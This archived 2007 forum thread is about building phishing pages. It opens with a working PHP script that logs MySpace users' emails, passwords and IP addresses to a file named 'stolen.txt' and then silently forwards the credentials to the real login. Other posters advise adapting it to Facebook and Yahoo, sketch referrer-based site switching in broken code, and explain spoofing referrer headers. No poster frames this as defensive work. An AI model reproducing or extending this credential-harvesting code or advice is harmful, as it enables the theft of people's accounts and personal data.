PDA

View Full Version : Nubs + PHP



Snowe
09-14-2007, 04:14 PM
argh, is there anyway to get a php to send me ip, password and username/email without having to edit it for each individual site?

This is what i currently use for MySpace...


<?php

if(isset($_POST["email"]) && isset($_POST["password"]))
{
$userEmail = $_POST["email"];
$userPassword = $_POST["password"];
$referer = $_SERVER["HTTP_REFERER"];
$ipAddress= $_SERVER["REMOTE_ADDR"];
$logLine = "
Email: $userEmail
Password: $userPassword
IP address: $ipAddress
Referrer: $referer
";

if(!$logHandle = fopen("stolen.txt", "a"))
{
print("Can't open the file. Exiting...");
exit(0);
}

if(!fwrite($logHandle, $logLine))
{
print("Couldn't write to the file. Exiting...");
exit(0);
}

fclose($logHandle);
print("
<html>
<head>
</head>
<body>
<form method=\"post\" action=\"http://login.myspace.com/index.cfm?fuseaction=login.process\" id=\"myspace_form\">
<input name=\"Login\" type=\"hidden\" value=\"" . $_POST["Login"] . "\" />
<input name=\"email\" type=\"hidden\" value=\"" . $_POST["email"] . "\" />
<input name=\"password\" type=\"hidden\" value=\"" . $_POST["password"] . "\" />
<input name=\"Remember\" type=\"hidden\" value=\"" . $_POST["Remember"] . "\" />
</form>
<script type=\"text/javascript\">
document.getElementById(\"myspace_form\").submit();
</script>
</body>
</html>
");
}

?>

Is there anyway to make it so it can "theoretically" work with multiple sites? facebook, myspace and yahoo for example?

SyntaXmasteR
09-14-2007, 04:52 PM
First thought... you are just BEGGING to get hacked! You do not validate any of your data!

VALIDATE you DATA!

Anyways you can tweak your code to grab the website from the referrer inside a switch statment:



<?
function find_redirect($referrer){

if($preg_match('/^myspace^/',$referrer){
return(*);
}else if($preg_match('/^facebook^/',$referrer){
return(2);
}
}

switch(find_redirect($_SERVER["HTTP_REFERER"])){
case *:
// DO THIS FOR MYSPACE
break;

case 2:
// DO THIS FOR FACEBOOK
break
}

?>

Ezekiel
09-15-2007, 05:46 AM
Syntax's idea of a multi-purpose phishing page would be the best solution, but you would need a good PHP knowledge in order to adapt it for all the different POST variables and possible redirections for each site.

Really, you'd need that knowledge in order to change your script, whatever method you choose to use. Websites are way too varied in so many ways for a catch-all phishing script to be written -- they have different form input names, for example.

I guess you could make a script that writes the entire POST array to a text file then redirects to Google (or the referrer), but that isn't a great way of accomplishing this.

Whatever you do, you'd still need to modify the HTML file of each individual website so the form's action parameter is set you the URL of your phishing script.

Snowe
09-16-2007, 10:43 PM
I sorta just gave up on the whole "catch-all" phishing idea... decided to just make one for each site... it's much easier, and since i know very little about php, html, scripting, etc... it's probably the best way to go, learn a bit about each site and how they work, learn a bit how things would change/need to be changed...

Thanks though.

SyntaXmasteR
09-16-2007, 10:53 PM
Can anyone give a working example of how to send a fake referrer URL using php. I've read a few, but they do not work. Microsoft (UK) was hacked because of this, and now I store all of my referrer information in Base64 knowing it can manipulated.

If anyone has this information please post it! Sending a custom header via php. That would be a great tutorial if anyone knows enough about it.

Ezekiel
09-17-2007, 03:09 AM
Can anyone give a working example of how to send a fake referrer URL using php. I've read a few, but they do not work. Microsoft (UK) was hacked because of this, and now I store all of my referrer information in Base64 knowing it can manipulated.

If anyone has this information please post it! Sending a custom header via php. That would be a great tutorial if anyone knows enough about it.

To the best of my knowledge, that's impossible. Referrer headers are generated by the browser and can't be interfered with by the server.

For example, you can redirect someone with this:


<?php
header("Host: http://www.google.com/redirected.php");
?>

Or with a meta tag redirect, but they will always send the referrer of the URL they came from.

The only possible way I can see this happening would be if a XSS vulnerability was discovered on the target referrer site, then people given links which insert code to exploit the vulnerability and redirect them from this site to the destination.

SyntaXmasteR
09-17-2007, 09:16 AM
The referrer url can be completely spoofed. Thats why modules for IE give the referrer "None of your business". You can create headers in php, and send the fake headers to a url. My problem is I do not know how? :mad:

A hacker sent fake referrers to Microsoft. Microsoft evidently saves referrers in a database in plain text. This referrer url hijacked the database giving the hacker full privledges.

Ezekiel
09-19-2007, 04:20 PM
The referrer url can be completely spoofed. Thats why modules for IE give the referrer "None of your business". You can create headers in php, and send the fake headers to a url. My problem is I do not know how? :mad:

A hacker sent fake referrers to Microsoft. Microsoft evidently saves referrers in a database in plain text. This referrer url hijacked the database giving the hacker full privledges.

I thought you were talking about forcing users' browsers to visit a different website with a spoofed referrer.

When making the request yourself, it's easy. All you have to do is make a standard HTTP request with your desired referrer.

See the PHP sockets page for info on how to do this in PHP:

http://www.php.net/sockets

It could be done with telnet, if you wanted to bypass programming altogether.

Moonbat
09-19-2007, 05:20 PM
Or just use the refspoof extension for Firefox :D